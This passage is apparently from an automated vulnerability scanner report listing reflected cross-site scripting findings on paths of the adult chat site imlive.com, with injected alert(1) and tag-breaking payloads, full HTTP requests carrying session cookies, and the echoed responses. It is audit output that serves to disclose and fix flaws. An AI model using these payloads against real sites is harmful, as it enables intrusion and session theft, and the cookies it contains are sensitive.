Request

GET /live-sex-chats/free-sex-video-for-ipod/?5370e"><a>3222e16e08d=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:12 GMT
Connection: close
Content-Length: 73010
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/free-sex-video-for-ipod/?5370e"><a>3222e16e08d=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

4.513. http://imlive.com/live-sex-chats/free-sex-video-for-ipod/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/free-sex-video-for-ipod/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload daba9'-alert(1)-'82614b3e5e9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /live-sex-chats/free-sex-video-for-ipod/?daba9'-alert(1)-'82614b3e5e9=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:19 GMT
Connection: close
Content-Length: 73157
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/ipodmain.aspx&he=imlive.com&ul=/live-sex-chats/free-sex-video-for-ipod/?daba9'-alert(1)-'82614b3e5e9=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined'
...[SNIP]...

4.514. http://imlive.com/live-sex-chats/free-sex-video/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://imlive.com
Path:	/live-sex-chats/free-sex-video/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e26eb"><a>443e0c98ab7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/free-sex-video/?e26eb"><a>443e0c98ab7=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:23 GMT
Connection: close
Content-Length: 52111
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/free-sex-video/?e26eb"><a>443e0c98ab7=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

4.515. http://imlive.com/live-sex-chats/free-sex-video/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/free-sex-video/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b11eb'-alert(1)-'f3d704a6f4f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /live-sex-chats/free-sex-video/?b11eb'-alert(1)-'f3d704a6f4f=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:29 GMT
Connection: close
Content-Length: 52326
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/competitionspage.aspx&he=imlive.com&ul=/live-sex-chats/free-sex-video/?b11eb'-alert(1)-'f3d704a6f4f=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined'
...[SNIP]...

4.516. http://imlive.com/live-sex-chats/gay-couple/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://imlive.com
Path:	/live-sex-chats/gay-couple/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20260"><a>39ff4f914a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/gay-couple/?20260"><a>39ff4f914a4=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

4.517. http://imlive.com/live-sex-chats/gay-couple/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/gay-couple/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d2072'-alert(1)-'fe8b9fbca10 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /live-sex-chats/gay-couple/?d2072'-alert(1)-'fe8b9fbca10=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:20:59 GMT
Connection: close
Content-Length: 34366
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/gay-couple/?d2072'-alert(1)-'fe8b9fbca10=1&qs=cat=1^roomid=52^d2072'-alert(1)-'fe8b9fbca10=1&qs=cat=1^roomid=52^d2072'-alert(1)-'fe8b9fbca10=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eb
...[SNIP]...

4.518. http://imlive.com/live-sex-chats/gay/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://imlive.com
Path:	/live-sex-chats/gay/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b640"><a>ffa3e1dc7af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/gay/?3b640"><a>ffa3e1dc7af=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

4.519. http://imlive.com/live-sex-chats/gay/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/gay/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4cfa'-alert(1)-'0c9972c192e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /live-sex-chats/gay/?d4cfa'-alert(1)-'0c9972c192e=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:21:28 GMT
Connection: close
Content-Length: 195962
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/gay/?d4cfa'-alert(1)-'0c9972c192e=1&qs=cat=1^roomid=53^d4cfa'-alert(1)-'0c9972c192e=1&qs=cat=1^roomid=53^d4cfa'-alert(1)-'0c9972c192e=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eb
...[SNIP]...

4.520. http://imlive.com/live-sex-chats/guy-alone/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/guy-alone/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5b427'-alert(1)-'a0cb4a3aa6b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /live-sex-chats/guy-alone/?5b427'-alert(1)-'a0cb4a3aa6b=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:19:39 GMT
Connection: close
Content-Length: 70611
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/guy-alone/?5b427'-alert(1)-'a0cb4a3aa6b=1&qs=cat=1^roomid=54^5b427'-alert(1)-'a0cb4a3aa6b=1&qs=cat=1^roomid=54^5b427'-alert(1)-'a0cb4a3aa6b=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eb
...[SNIP]...

4.521. http://imlive.com/live-sex-chats/guy-alone/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://imlive.com
Path:	/live-sex-chats/guy-alone/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88b77"><a>0945077855 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/guy-alone/?88b77"><a>0945077855=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
